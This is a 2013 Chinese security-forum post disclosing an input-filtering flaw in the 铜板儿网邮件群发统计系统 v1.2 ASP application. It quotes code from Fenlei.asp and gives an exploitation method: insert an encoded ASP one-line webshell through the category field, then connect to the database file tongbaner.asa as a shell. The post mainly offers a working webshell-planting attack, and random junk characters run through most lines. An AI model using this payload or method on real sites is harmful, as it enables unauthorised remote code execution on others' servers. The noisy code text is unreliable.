找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1947|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
'Fenlei.asp 3 E+ S: j' J2 n
9 F$ l# B/ u! L" l( |- Y
IF Request.QueryString("Action")="del" Then
# l: j, g2 g  p0 x' E1 C; o% XID=Request.QueryString("ID")
3 M. }% R0 E& S1 KIF Countss ("tui","Fenlei",ID )<>0 then 7 \; }3 {. V) P5 q) }0 C  F
'略
' F; O& y/ W5 {8 Y$ dIF Request.QueryString("Action")="Add" Then + C# M- P( D, e5 |; v' T' j9 s
Tname=Request.Form("Typename")
, Y9 d# L2 I2 Z# {( Z1 p; MSet Rs=Server.CreateObject("adodb.Recordset")
" e. U; [% v* s: E# D% h' sSql="Select * From Fenlei Order by id Desc " ! @/ _& s0 o' L7 u5 u9 J* `8 G
Rs.Open Sql,Conn,1,3 * R% m" Q/ Z7 k8 u
Rs.Addnew 6 w; J6 e0 Y$ S
Rs("Typename")=Tname , Z8 R  L3 r/ N, h% }1 o
'略 4 `. V: J" a7 g- i' f
Set Rs=Server.CreateObject("adodb.Recordset") # o" L5 n( t, A! d8 N  [
Sql="Select * From Fenlei Order by id Desc " 5 c  ?0 i0 C7 P2 {% e! ^# x9 ^9 X& G
Rs.Open Sql,Conn,1,1 # Y. u& S9 S* q& Q2 ~  o' [- \
'略
& [8 Y$ Z% h- u%>/ U% G, i* {  b  @' l" v$ d
0 n; l# o5 ?' F* {! Y$ [# G: v: h
& g  ~. p8 e. Q3 s6 s2 Z) Y
1 ^3 i4 Q2 P7 U. i+ y, ?$ X" w5 V
没有过滤,直接写入数据库。' f) B. @% n8 X
' U4 T5 E8 b3 Y+ Z  O9 y
利用方法:* g/ i! e# C- U* c5 }% ~0 b
5 j) M. M1 Y' }; B  |2 ~
插入:┼攠數畣整爠煥敵瑳∨≡┩>: A7 @  e$ E* W& X

! }& K8 v' U  q; Z* c3 S 7 E1 P  |5 }0 s) h$ [" ?9 r
连接: http://www.xxx.com/###tongbaner.asa ; l1 L. m, f  X$ I& K4 ?6 o
'默认安装文件: 8 ~8 X. ~* s+ A+ _( G* f/ E
'install.asp
, l$ {- Z/ r2 E: u+ d, l& p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表